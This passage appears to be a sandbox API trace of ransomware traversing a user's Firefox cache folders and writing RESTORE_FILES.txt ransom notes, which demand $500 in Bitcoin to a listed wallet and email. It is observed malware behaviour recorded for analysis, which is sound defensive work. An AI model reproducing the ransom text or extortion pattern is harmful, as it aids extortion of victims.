preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.200] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.201] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.201] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.201] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.201] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.201] CloseHandle (hObject=0x158) returned 1 [0086.201] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Windows") returned -1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Program Files") returned -1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1="6", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1="6", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned 97 [0086.202] lstrcmpW (lpString1="6", lpString2=".") returned 1 [0086.202] lstrcmpW (lpString1="6", lpString2="..") returned 1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*") returned 99 [0086.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.202] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\.") returned 99 [0086.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.202] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\..") returned 100 [0086.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.202] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.202] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\RESTORE_FILES.txt") returned 115 [0086.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.203] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.204] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.204] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.204] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.204] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.204] CloseHandle (hObject=0x158) returned 1 [0086.204] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Windows") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Program Files") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Program Files (x86)") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="$Recycle.bin") returned 1 [0086.204] lstrcmpiW (lpString1="7", lpString2="System Volume Information") returned -1 [0086.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned 97 [0086.204] lstrcmpW (lpString1="7", lpString2=".") returned 1 [0086.204] lstrcmpW (lpString1="7", lpString2="..") returned 1 [0086.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*") returned 99 [0086.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.205] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\.") returned 99 [0086.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.206] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.206] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.206] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\..") returned 100 [0086.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.206] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.206] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.206] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\RESTORE_FILES.txt") returned 115 [0086.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.206] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.207] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.207] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.207] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.207] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.208] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.208] CloseHandle (hObject=0x158) returned 1 [0086.208] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Program Files") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Program Files (x86)") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="$Recycle.bin") returned 1 [0086.208] lstrcmpiW (lpString1="8", lpString2="System Volume Information") returned -1 [0086.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned 97 [0086.208] lstrcmpW (lpString1="8", lpString2=".") returned 1 [0086.208] lstrcmpW (lpString1="8", lpString2="..") returned 1 [0086.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*") returned 99 [0086.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\.") returned 99 [0086.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.208] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\..") returned 100 [0086.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.209] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.209] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\RESTORE_FILES.txt") returned 115 [0086.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\8\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.210] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.210] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.210] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.210] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.211] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.211] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.211] CloseHandle (hObject=0x158) returned 1 [0086.211] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Windows") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Program Files") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Program Files (x86)") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="$Recycle.bin") returned 1 [0086.211] lstrcmpiW (lpString1="9", lpString2="System Volume Information") returned -1 [0086.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned 97 [0086.211] lstrcmpW (lpString1="9", lpString2=".") returned 1 [0086.211] lstrcmpW (lpString1="9", lpString2="..") returned 1 [0086.211] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*") returned 99 [0086.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.212] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\.") returned 99 [0086.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.213] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 